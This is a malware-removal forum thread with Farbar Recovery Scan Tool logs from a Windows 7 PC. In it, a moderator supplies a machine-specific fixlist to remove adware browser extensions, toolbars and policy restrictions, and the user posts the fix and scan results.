2012-08-14 11:42 - 2012-08-14 11:42 - 00013824 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\TextExtractor.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00032768 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\Autobackup.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00055808 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\RosettaAllShare.dll
2012-08-21 11:25 - 2012-08-21 11:25 - 00227840 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\boost_serialization-vc90-mt-1_47.dll
2012-08-21 11:26 - 2012-08-21 11:26 - 00038912 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\boost_date_time-vc90-mt-1_47.dll
2012-08-21 11:25 - 2012-08-21 11:25 - 00012800 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\boost_system-vc90-mt-1_47.dll
2012-08-21 11:26 - 2012-08-21 11:26 - 00046592 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\boost_thread-vc90-mt-1_47.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00044032 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\us.dll
2014-04-23 16:05 - 2014-04-23 16:05 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-04-23 16:04 - 2014-04-23 16:04 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2014-04-23 16:04 - 2014-04-23 16:04 - 00237384 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2014-08-12 16:29 - 2014-08-12 16:29 - 19329904 _____ () C:\Program Files\Alwil Software\Avast5\libcef.dll
2013-05-02 18:54 - 2013-05-02 18:54 - 00170496 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\d89f0252d910d617de1de783a812f840\IsdiInterop.ni.dll
2010-07-02 18:24 - 2010-03-04 10:08 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\Temp:1A60DE96
AlternateDataStreams: C:\ProgramData\Temp:4D066AD2
AlternateDataStreams: C:\ProgramData\Temp:5D7E5A8F
AlternateDataStreams: C:\ProgramData\Temp:CDFF58FE
AlternateDataStreams: C:\ProgramData\Temp:E1F04E8D
AlternateDataStreams: C:\ProgramData\Temp:E36F5B57
AlternateDataStreams: C:\Users\Papa\Downloads\.DS_Store:AFP_AfpInfo
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: Comrade.exe => C:\Program Files (x86)\GameSpy\Comrade\Comrade.exe
MSCONFIG\startupreg: mobilegeni daemon => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe
MSCONFIG\startupreg: Starter => C:\Program Files (x86)\Driver-Soft\DriverGenius\StarterW3i.exe
MSCONFIG\startupreg: uTorrent => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\uTorrent\uTorrent.exe /MINIMIZED
 
==================== Faulty Device Manager Devices =============
 
Name: High Definition Audio-Controller
Description: High Definition Audio-Controller
Class Guid: {4d36e97d-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: HDAudBus
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/12/2014 05:59:17 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcInit started failed with 0
 
Error: (08/12/2014 05:59:17 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcMain failed with 0
 
Error: (08/12/2014 04:33:45 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcInit started failed with 0
 
Error: (08/12/2014 04:33:45 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcMain failed with 0
 
Error: (08/12/2014 04:30:19 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "ConvertStringSidToSid(S-1-5-21-4169419405-2626366916-160398126-1004.bak)" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070539, Die Struktur der Sicherheitskennung ist unzulässig.
.
 
 
Vorgang:
   OnIdentify-Ereignis
   Generatordaten werden gesammelt
 
Kontext:
   Ausführungskontext: Shadow Copy Optimization Writer
   Generatorklassen-ID: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
   Generatorname: Shadow Copy Optimization Writer
   Generatorinstanz-ID: {5f173d22-5d52-4979-a9fd-16ba07107abb}
 
Error: (08/12/2014 04:25:29 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "ConvertStringSidToSid(S-1-5-21-4169419405-2626366916-160398126-1004.bak)" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070539, Die Struktur der Sicherheitskennung ist unzulässig.
.
 
 
Vorgang:
   OnIdentify-Ereignis
   Generatordaten werden gesammelt
 
Kontext:
   Ausführungskontext: Shadow Copy Optimization Writer
   Generatorklassen-ID: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
   Generatorname: Shadow Copy Optimization Writer
   Generatorinstanz-ID: {29c73526-6810-405b-a01f-6ec330688b20}
 
Error: (08/12/2014 04:18:42 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcInit started failed with 0
 
Error: (08/12/2014 04:18:42 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcMain failed with 0
 
Error: (08/11/2014 06:03:10 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcInit started failed with 0
 
Error: (08/11/2014 06:03:10 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcMain failed with 0
 
 
System errors:
=============
Error: (08/12/2014 06:02:51 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: Der Dienst "Intel® Management & Security Application User Notification Service" ist von folgendem Dienst abhängig: LMS. Dieser Dienst ist eventuell nicht installiert.
 
Error: (08/12/2014 06:00:09 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Das Laden folgender Boot- oder Systemstarttreiber ist fehlgeschlagen: 
sptd
 
Error: (08/12/2014 05:59:44 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "IP-Hilfsdienst" wurde mit folgendem Fehler beendet: 
%%13
 
Error: (08/12/2014 05:59:21 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "PnkBstrA" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2
 
Error: (08/12/2014 05:59:21 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "DefaultTabUpdate" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2
 
Error: (08/12/2014 05:59:21 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Bluetooth Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2
 
Error: (08/12/2014 05:58:45 PM) (Source: sptd) (EventID: 4) (User: )
Description: Der Treiber hat einen internen Fehler in seinen Datenstrukturen für  festgestellt.
 
Error: (08/12/2014 04:39:36 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: Der Dienst "Intel® Management & Security Application User Notification Service" ist von folgendem Dienst abhängig: LMS. Dieser Dienst ist eventuell nicht installiert.
 
Error: (08/12/2014 04:37:16 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Das Laden folgender Boot- oder Systemstarttreiber ist fehlgeschlagen: 
sptd
 
Error: (08/12/2014 04:35:20 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "IP-Hilfsdienst" wurde mit folgendem Fehler beendet: 
%%13
 
 
Microsoft Office Sessions:
=========================
Error: (08/12/2014 05:59:17 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcInit started failed with 0
 
Error: (08/12/2014 05:59:17 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcMain failed with 0
 
Error: (08/12/2014 04:33:45 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcInit started failed with 0
 
Error: (08/12/2014 04:33:45 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcMain failed with 0
 
Error: (08/12/2014 04:30:19 PM) (Source: VSS) (EventID: 8193) (User: )
Description: ConvertStringSidToSid(S-1-5-21-4169419405-2626366916-160398126-1004.bak)0x80070539, Die Struktur der Sicherheitskennung ist unzulässig.
 
 
Vorgang:
   OnIdentify-Ereignis
   Generatordaten werden gesammelt
 
Kontext:
   Ausführungskontext: Shadow Copy Optimization Writer
   Generatorklassen-ID: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
   Generatorname: Shadow Copy Optimization Writer
   Generatorinstanz-ID: {5f173d22-5d52-4979-a9fd-16ba07107abb}
 
Error: (08/12/2014 04:25:29 PM) (Source: VSS) (EventID: 8193) (User: )
Description: ConvertStringSidToSid(S-1-5-21-4169419405-2626366916-160398126-1004.bak)0x80070539, Die Struktur der Sicherheitskennung ist unzulässig.
 
 
Vorgang:
   OnIdentify-Ereignis
   Generatordaten werden gesammelt
 
Kontext:
   Ausführungskontext: Shadow Copy Optimization Writer
   Generatorklassen-ID: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
   Generatorname: Shadow Copy Optimization Writer
   Generatorinstanz-ID: {29c73526-6810-405b-a01f-6ec330688b20}
 
Error: (08/12/2014 04:18:42 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcInit started failed with 0
 
Error: (08/12/2014 04:18:42 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcMain failed with 0
 
Error: (08/11/2014 06:03:10 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcInit started failed with 0
 
Error: (08/11/2014 06:03:10 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcMain failed with 0
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-08-11 20:49:26.988
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-24 22:11:54.648
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 21:19:16.160
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 20:49:06.298
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 19:43:07.577
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 15:30:03.076
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 15:06:46.399
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 14:42:01.277
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 14:01:43.744
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-10 23:42:11.578
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
 
==================== Memory info =========================== 
 
Percentage of memory in use: 46%
Total physical RAM: 3766.69 MB
Available physical RAM: 2001.54 MB
Total Pagefile: 7531.51 MB
Available Pagefile: 5324.8 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
 
==================== Drives ================================
 
Drive c: (Acer) (Fixed) (Total:685.54 GB) (Free:257.74 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 699 GB) (Disk ID: 348EEB9E)
Partition 1: (Not Active) - (Size=13 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=686 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================
 
Thank you.

  • 0

#4
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Well that cleared a little rubbish.. On completion of this run could you let me know how the computer is behaving

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 

GroupPolicyUsers\S-1-5-21-4169419405-2626366916-160398126-1007\User: Group Policy restriction detected <======= ATTENTION
GroupPolicyUsers\S-1-5-21-4169419405-2626366916-160398126-1006\User: Group Policy restriction detected <======= ATTENTION
GroupPolicyUsers\S-1-5-21-4169419405-2626366916-160398126-1003\User: Group Policy restriction detected <======= ATTENTION
SearchScopes: HKCU - {1936EF5F-34A0-4463-AFA7-876B5DEBF462} URL = http://search.condui...5253069553&UM=1
BHO-x32: Related Searches -> {96A25A24-2E87-4374-8A50-CC6F943FCE4D} -> C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\Apps\RelatedLinksBHO.dll No File
BHO-x32: SmartBar Helper Object -> {FD36FEBE-DBA1-4597-9DD1-B13794B92F68} -> C:\Program Files (x86)\Bechiro S.L\smartbar\1.8.8.12\bh\smartbar.dll (Montera Technologeis LTD)
Toolbar: HKLM-x32 - Related Searches - {96A25A24-2E87-4374-8A50-CC6F943FCE4D} - C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\Apps\RelatedLinksBHO.dll No File
Toolbar: HKCU - No Name - {25E2E5C9-C43C-4EE8-B23E-4383915F2BCE} - No File
FF Extension: savenshAriE - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: SearchNewTab - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: Soearachh-NewTiaabi - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: contaiynuettosaovve - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: greaTsavear - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
S2 DefaultTabUpdate; "C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\DTUpdate.exe" [X]
C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\pflphaooapbgpeakohlggbpidpppgdff
C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nohfdhapjjlndfgjnmdlcabloeembdkj
C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf
C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
C:\Program Files (x86)\Bechiro S.L
C:\Users\Papa\AppData\Roaming\DefaultTab
EmptyTemp:
CMD: bitsadmin /reset /allusers


Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated please post that
  • 0

#5
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.
  • 0

#6
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
User returned
  • 0

#7
langvu900

langvu900

    Member

  • Topic Starter
  • Member
  • PipPip
  • 11 posts

Hey there, thanks for reopening the topic. Here is the txt file, it name is Fixlog. And my computer ran faster after the clean and recovery, but then it got slower, but still faster than before. Thanks again!

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 17-08-2014 01

Ran by Papa at 2014-08-19 16:33:55 Run:1
Running from C:\Users\PhanCo.FAMILIE-LE-NB\Downloads
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
GroupPolicyUsers\S-1-5-21-4169419405-2626366916-160398126-1007\User: Group Policy restriction detected <======= ATTENTION
GroupPolicyUsers\S-1-5-21-4169419405-2626366916-160398126-1006\User: Group Policy restriction detected <======= ATTENTION
GroupPolicyUsers\S-1-5-21-4169419405-2626366916-160398126-1003\User: Group Policy restriction detected <======= ATTENTION
SearchScopes: HKCU - {1936EF5F-34A0-4463-AFA7-876B5DEBF462} URL = http://search.condui...5253069553&UM=1
BHO-x32: Related Searches -> {96A25A24-2E87-4374-8A50-CC6F943FCE4D} -> C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\Apps\RelatedLinksBHO.dll No File
BHO-x32: SmartBar Helper Object -> {FD36FEBE-DBA1-4597-9DD1-B13794B92F68} -> C:\Program Files (x86)\Bechiro S.L\smartbar\1.8.8.12\bh\smartbar.dll (Montera Technologeis LTD)
Toolbar: HKLM-x32 - Related Searches - {96A25A24-2E87-4374-8A50-CC6F943FCE4D} - C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\Apps\RelatedLinksBHO.dll No File
Toolbar: HKCU - No Name - {25E2E5C9-C43C-4EE8-B23E-4383915F2BCE} - No File
FF Extension: savenshAriE - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: SearchNewTab - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: Soearachh-NewTiaabi - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: contaiynuettosaovve - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: greaTsavear - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
S2 DefaultTabUpdate; "C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\DTUpdate.exe" [X]
C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\pflphaooapbgpeakohlggbpidpppgdff
C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nohfdhapjjlndfgjnmdlcabloeembdkj
C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf
C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
C:\Program Files (x86)\Bechiro S.L
C:\Users\Papa\AppData\Roaming\DefaultTab
EmptyTemp:
CMD: bitsadmin /reset /allusers
*****************
 
C:\Windows\system32\GroupPolicyUsers\S-1-5-21-4169419405-2626366916-160398126-1007\User => Moved successfully.
C:\Windows\system32\GroupPolicy\GPT.ini => Moved successfully.
C:\Windows\system32\GroupPolicyUsers\S-1-5-21-4169419405-2626366916-160398126-1006\User => Moved successfully.
C:\Windows\system32\GroupPolicyUsers\S-1-5-21-4169419405-2626366916-160398126-1003\User => Moved successfully.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{1936EF5F-34A0-4463-AFA7-876B5DEBF462}" => Key deleted successfully.
"HKCR\CLSID\{1936EF5F-34A0-4463-AFA7-876B5DEBF462}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{96A25A24-2E87-4374-8A50-CC6F943FCE4D}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{96A25A24-2E87-4374-8A50-CC6F943FCE4D}" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FD36FEBE-DBA1-4597-9DD1-B13794B92F68}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{FD36FEBE-DBA1-4597-9DD1-B13794B92F68}" => Key deleted successfully.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{96A25A24-2E87-4374-8A50-CC6F943FCE4D} => value deleted successfully.
"HKCR\Wow6432Node\CLSID\{96A25A24-2E87-4374-8A50-CC6F943FCE4D}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{25E2E5C9-C43C-4EE8-B23E-4383915F2BCE} => value deleted successfully.
"HKCR\CLSID\{25E2E5C9-C43C-4EE8-B23E-4383915F2BCE}" => Key not found.
C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] => Moved successfully.
C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] => Moved successfully.
C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] => Moved successfully.
C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] => Moved successfully.
C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] => Moved successfully.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
DefaultTabUpdate => Service deleted successfully.
C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\pflphaooapbgpeakohlggbpidpppgdff => Moved successfully.
C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nohfdhapjjlndfgjnmdlcabloeembdkj => Moved successfully.
C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf => Moved successfully.
C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj => Moved successfully.
C:\Program Files (x86)\Bechiro S.L => Moved successfully.
"C:\Users\Papa\AppData\Roaming\DefaultTab" => File/Directory not found.
 
=========  bitsadmin /reset /allusers =========
 
 
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.
 
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
 
Unable to cancel {3764EBA8-AA09-4394-93D9-E43A63D6FD9F}.
Unable to cancel {814C8FF6-9BA0-490A-8137-4E10DA834FA0}.
Unable to cancel {44D6011A-6420-474D-9D27-F4BC129823B3}.
Unable to cancel {79FA2B02-F867-4A31-B5D2-0B69E2B5CE3D}.
Unable to cancel {231EBE61-C5DB-4A8C-8AD6-5A588DCBF3D7}.
Unable to cancel {DC9768EC-2D42-4A86-AF1F-D39790F83C68}.
Unable to cancel {ED9484D8-9A4D-4840-870B-17ED8625B5CB}.
Unable to cancel {9C27EB32-60AB-41AF-8310-0748C49DF110}.
Unable to cancel {AE349C23-1F3E-4867-935F-6B38C5FF3BD1}.
0 out of 9 jobs canceled.
 
========= End of CMD: =========
 
EmptyTemp: => Removed 19.8 GB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====

  • 0

#8
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Could you now run me a fresh FRST scan to see if anything has returned in the interim
  • Run FRST
  • Select additions at the bottom
  • Press Scan button.
    frst.JPG
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please attach both logs generated.

  • 0

#9
langvu900

langvu900

    Member

  • Topic Starter
  • Member
  • PipPip
  • 11 posts

Hi, here are the txt files

FRST.txt

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 17-08-2014 01

Ran by Papa (administrator) on FAMILIE-LE-NB on 21-08-2014 16:25:56
Running from C:\Users\PhanCo.FAMILIE-LE-NB\Desktop
Platform: Windows 7 Home Premium (X64) OS Language: Deutsch (Deutschland)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\afwServ.exe
(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
(Samsung) C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\AllShareFrameworkManagerDMS.exe
(Samsung) C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\AllShareFrameworkDMS.exe
(Copyright 2012 SAMSUNG) C:\Users\Papa\Documents\AllShare Play\AllShare Play Service.exe
(Copyright 2012 SAMSUNG) C:\Users\Papa\Documents\AllShare Play\AllShare Play Service.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(NCT Corporation) C:\Program Files (x86)\NhacCuaTui\1.0.6.27\NhacCuaTui.exe
(Itim Technologies Co., Ltd.) C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\1.3.39.7\CocCocCrashHandler.exe
(Akamai Technologies, Inc.) C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Akamai\netsession_win.exe
(i-Funbox.com) C:\Program Files (x86)\iFunbox 2013\iFunBox2013.exe
(Akamai Technologies, Inc.) C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Akamai\netsession_win.exe
(Internet Download Manager, Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(CyberLink Corp.) C:\Program Files (x86)\Cyberlink\YouCam6\YouCamService6.exe
(Aeria Games & Entertainment) C:\Program Files (x86)\Aeria Games\Ignite\aeriaignite.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastUI.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(VNPT-CA) C:\Program Files (x86)\VNPT-CA\VNPT-CA CL Token Manager v1\vnpt-ca_cl_v1_certd.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
